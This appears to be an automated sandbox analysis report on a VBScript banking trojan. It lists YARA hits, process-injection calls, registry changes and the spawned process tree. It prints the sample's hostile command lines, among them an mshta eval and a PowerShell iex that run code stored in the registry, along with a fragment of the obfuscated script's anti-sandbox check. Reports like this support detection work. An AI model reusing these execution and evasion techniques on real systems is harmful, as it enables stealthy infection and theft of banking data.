Source: Yara match	File source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Source: C:\Windows\System32\control.exe	Code function: 25_2_00B83830 NtWriteVirtualMemory,	25_2_00B83830
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8387C NtCreateSection,	25_2_00B8387C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7BAB4 NtAllocateVirtualMemory,	25_2_00B7BAB4
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B81AC4 NtQueryInformationProcess,	25_2_00B81AC4
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7CCA0 NtReadVirtualMemory,	25_2_00B7CCA0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9ADD4 NtQueryInformationProcess,	25_2_00B9ADD4
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8F560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	25_2_00B8F560
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9F7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,	25_2_00B9F7EC
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8FFCC NtMapViewOfSection,	25_2_00B8FFCC
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	25_2_00B9676C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00BB1002 NtProtectVirtualMemory,NtProtectVirtualMemory,	25_2_00BB1002
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,	39_2_0000027FF74EF7EC
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D1AC4 NtQueryInformationProcess,	39_2_0000027FF74D1AC4
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF7501002 NtProtectVirtualMemory,NtProtectVirtualMemory,	39_2_0000027FF7501002

Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9C164	25_2_00B9C164
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9A4BC	25_2_00B9A4BC
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9676C	25_2_00B9676C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9E080	25_2_00B9E080
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B920F8	25_2_00B920F8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7203C	25_2_00B7203C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B90034	25_2_00B90034
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B96064	25_2_00B96064
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8B040	25_2_00B8B040
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B991A0	25_2_00B991A0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B89138	25_2_00B89138
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7C134	25_2_00B7C134
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B81174	25_2_00B81174
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9F940	25_2_00B9F940
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B98224	25_2_00B98224
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B93208	25_2_00B93208
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B89380	25_2_00B89380
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B72BC8	25_2_00B72BC8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B77320	25_2_00B77320
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B78B5C	25_2_00B78B5C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B994B8	25_2_00B994B8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B89CB0	25_2_00B89CB0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8D4A8	25_2_00B8D4A8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7BCF8	25_2_00B7BCF8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B83CE0	25_2_00B83CE0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B974CC	25_2_00B974CC
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B80CC0	25_2_00B80CC0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7D460	25_2_00B7D460
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B81D94	25_2_00B81D94
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8452C	25_2_00B8452C
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8B520	25_2_00B8B520
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9B516	25_2_00B9B516
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B76D08	25_2_00B76D08
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9BEB0	25_2_00B9BEB0
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B926B4	25_2_00B926B4
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7AE04	25_2_00B7AE04
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B817B8	25_2_00B817B8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B9AFB8	25_2_00B9AFB8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B737B8	25_2_00B737B8
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B79F98	25_2_00B79F98
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B8F770	25_2_00B8F770
Source: C:\Windows\System32\control.exe	Code function: 25_2_00B7B75C	25_2_00B7B75C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EC164	39_2_0000027FF74EC164
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EA4BC	39_2_0000027FF74EA4BC
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E3208	39_2_0000027FF74E3208
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E91A0	39_2_0000027FF74E91A0
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E8224	39_2_0000027FF74E8224
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E20F8	39_2_0000027FF74E20F8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D1174	39_2_0000027FF74D1174
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D9138	39_2_0000027FF74D9138
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74CC134	39_2_0000027FF74CC134
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EF940	39_2_0000027FF74EF940
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D17B8	39_2_0000027FF74D17B8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C37B8	39_2_0000027FF74C37B8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EAFB8	39_2_0000027FF74EAFB8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E6064	39_2_0000027FF74E6064
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EE080	39_2_0000027FF74EE080
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C203C	39_2_0000027FF74C203C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E0034	39_2_0000027FF74E0034
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74DB040	39_2_0000027FF74DB040
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E26B4	39_2_0000027FF74E26B4
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EBEB0	39_2_0000027FF74EBEB0
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E676C	39_2_0000027FF74E676C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74DF770	39_2_0000027FF74DF770
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C9F98	39_2_0000027FF74C9F98
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74CB75C	39_2_0000027FF74CB75C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74CAE04	39_2_0000027FF74CAE04
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D3CE0	39_2_0000027FF74D3CE0
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74CBCF8	39_2_0000027FF74CBCF8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C6D08	39_2_0000027FF74C6D08
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74EB516	39_2_0000027FF74EB516
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74DD4A8	39_2_0000027FF74DD4A8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E94B8	39_2_0000027FF74E94B8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D9CB0	39_2_0000027FF74D9CB0
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74E74CC	39_2_0000027FF74E74CC
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D0CC0	39_2_0000027FF74D0CC0
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D1D94	39_2_0000027FF74D1D94
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D452C	39_2_0000027FF74D452C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74DB520	39_2_0000027FF74DB520
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C2BC8	39_2_0000027FF74C2BC8
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74CD460	39_2_0000027FF74CD460
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D9380	39_2_0000027FF74D9380
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C7320	39_2_0000027FF74C7320
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74D8B4C	39_2_0000027FF74D8B4C
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C8B5C	39_2_0000027FF74C8B5C

Source: 2Q4tLHa5wbO1.vbs

Initial sample: Strings found which are bigger than 50

Source: 5b2bnkld.dll.21.dr	Static PE information: No import functions for PE file found
Source: ztp4fhzn.dll.24.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winVBS@31/42@10/2

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B24C39E1-2D7D-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{523EEBAD-89C9-54C5-A3A6-CDC8873A517C}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{DE7DF658-A5CB-C008-1FF2-A9F4C346ED68}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_01
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{42CF918A-B9C5-C4B3-5396-FD38372A81EC}

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\adobe.url

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\2Q4tLHa5wbO1.vbs'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\2Q4tLHa5wbO1.vbs'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17418 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17424 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\404E.bi1'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17418 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17424 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\404E.bi1'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000015.00000002.780870851.000001EEE0E80000.00000002.00000001.sdmp, csc.exe, 00000018.00000002.791405788.0000024AD3D50000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001E.00000000.820880148.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 00000019.00000002.848753339.0000022984BCC000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000019.00000002.848753339.0000022984BCC000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001E.00000000.820880148.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.ScriptName, cStr(293199629)) > 0 And Ian961 = 0) Then' hazelnut eyebright nereid Carthage refugee adrenalin Pillsbury, cesium Verdi jujube impassion Chesapeake Martha newsmen, covariant jitter cosmos, bounce Dickerson Huffman roe decent critter mucus veneer, Algonquin Waterloo Pygmalion cupidity Faust Tyson, metallurgy sabotage beady dodge quadratic recess. laminar Hesse mimicking plan Vanderbilt mutton MacGregor Europa mycoplasma need seven axiomatic Manley plaguey boxy block clearheaded nightmare stingy assail Brandon Shepard theyll cachalot coercible indigestion imperious advisor lioness clockwise whelm valuate cue arbutus accordant wiseacre massage narwhal210. junta. billfold giveaway ROTC sake. antiphonal infinity ashame IBM diamagnetism erosive allegate birch cougar. cinematic Dahl leitmotif Exit FunctionEnd If' intrusive Breton Basque. 2165312 daunt Acapulco Annie Fargo permitted. conundrum mere waterhole eradicable lorry Rafael morass tinkle conservator Judd Steiner lusty Mendelssohn menstruate orthonormal. 3014178 orthodoxy. 5019054 informative irresolvable Philippine Mafioso, Augustus. slaughter381 bulb Berkowitz Leeuwenhoek Christmas stint, Saginaw switchback Set taxidermy = GetObject("winmgmts:\\.\root\cimv2")Set Annie354 = taxidermy.ExecQuery("Select * from Win32_ComputerSystem")For Each selenate In Annie354Vaduz = Vaduz + Int((selenate.TotalPhysicalMemory) / (((104 - (146 - 143.0)) - 94.0) + 1048569.0))NextIf Vaduz < (1446 - ((49 - 3.0) + (4631 - 4261.0))) ThenNtGJYPtIEnd IfREM governor, 3468779 Anglophobia congresswomen duckweed Preston wolfish tremendous motor Glidden Herculean dusk sari ellipsoid bacterial Vladivostok283 ventral Dreyfuss farther755 statuette ding coexist Hungarian, Rudy you symmetry youve cobblestone fascicle tire phlox Klux illustrate dispense ouzo Frey204 criterion barrier conscience curio constipate Bradley beware tariff, 6831937 scorpion. kaleidoscope surefire, 7605153 Oregon Melinda Plexiglas pot concurring End FunctionFunction Perkins637()on error resume nextDim detritus115: Set detritus115 = CreateObject("Scripting.FileSystemObject")Dim rnVGZw: Set rnVGZw = detritus115.OpenTextFile(WScript.ScriptFullName)' aristocrat electrician Fraser dispersive howsomever inhibit58 Berman. 3125459 amplitude604 minutemen Anderson985 Cadillac camelopard calculable. saga travelogue nomogram Vivian creedal. sluggish meritorious giraffe scathing139. concept Duncan Ruben tribal exclusion florist. cathedral diplomat flexible717 sludge neater Bernadine bluster suggestible focus mandrill Nashua anatomic vodka boxy963 Leona screenful Neal campfire bush foot crockery QED. convolute Fenton landlocked marathon Riordan. 9150746 Confucian mull consultant. stickle femur bailiff Kansas Mollie storekeep embeddable. proficient euphe293199629 abalone addressee strict rug Layton bloodstain Moll combustion, 2306119 assemble Prokofieff doberman = rnVGZw.ReadallrnVGZw.close'MsgBox(((1518 - (87 + (742 - 63.0))) - 29.0))REM India

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))			Jump to behavior

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'	Jump to behavior

Source: C:\Windows\System32\control.exe	Code function: 25_2_00B74DCD push 3B000001h; retf		25_2_00B74DD2
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C4DCD push 3B000001h; retf		39_2_0000027FF74C4DD2

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.dll	Jump to dropped file
